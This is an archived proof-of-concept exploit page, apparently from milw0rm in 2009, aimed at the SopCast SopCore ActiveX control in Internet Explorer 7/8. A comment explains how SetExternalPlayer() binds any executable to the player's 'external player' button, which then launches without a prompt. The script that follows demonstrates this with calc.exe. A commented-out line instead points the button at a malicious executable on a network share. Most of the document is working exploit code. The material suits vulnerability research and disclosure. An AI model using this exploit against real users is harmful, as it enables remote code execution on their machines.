42 lines
No EOL
1.4 KiB
HTML
42 lines
No EOL
1.4 KiB
HTML
<!-- Sopcast SopCore Control (sopocx.ocx 3.0.3.501) SetExternalPlayer()
|
|
user assisted remote code execution poc
|
|
by Nine:Situations:Group::surfista (IE7/8)
|
|
|
|
our site: http://retrogod.altervista.org/
|
|
software site: http://www.sopcast.org/
|
|
|
|
Through the SetExternalPlayer() method and the ExternalPlayer property
|
|
is possible to associate an arbitrary executable to the "external player"
|
|
button (for clearness see http://www.sopcast.com/docs/ where the player
|
|
control buttons are showed) which opens Windows Media Player by default.
|
|
When the user click this button, the executable is launched without prompts
|
|
Also this value is stored in config.xml, inside the sopcast local folder
|
|
for further use, ex. with the sopcast client application
|
|
Note: this control is safe for scripting and safe for initialization
|
|
-->
|
|
<HTML>
|
|
<HEAD>
|
|
<script language="Javascript" type="text/JavaScript">
|
|
window.onload=function()
|
|
{
|
|
SopPlayer.InitPlayer();
|
|
//SopPlayer.SetExternalPlayer("\\\\192.168.0.1\\c$\\PATH\\TO\\MALICIOUS_PROGRAM.EXE");
|
|
SopPlayer.SetExternalPlayer("c:\\WINDOWS\\system32\\calc.exe");
|
|
SopPlayer.SetSopAddress("sop://broker.sopcast.com:3912/6002"); //A LIVE CHANNEL ...
|
|
SopPlayer.SetChannelName("CCTV5");
|
|
SopPlayer.Play();
|
|
}
|
|
</script>
|
|
</HEAD>
|
|
<BODY>
|
|
<OBJECT
|
|
ID="SopPlayer"
|
|
name="SopPlayer"
|
|
CLASSID=clsid:8FEFF364-6A5F-4966-A917-A3AC28411659
|
|
HEIGHT=375
|
|
WIDTH=375>
|
|
</OBJECT>
|
|
</BODY>
|
|
</HTML>
|
|
|
|
# milw0rm.com [2009-03-03] |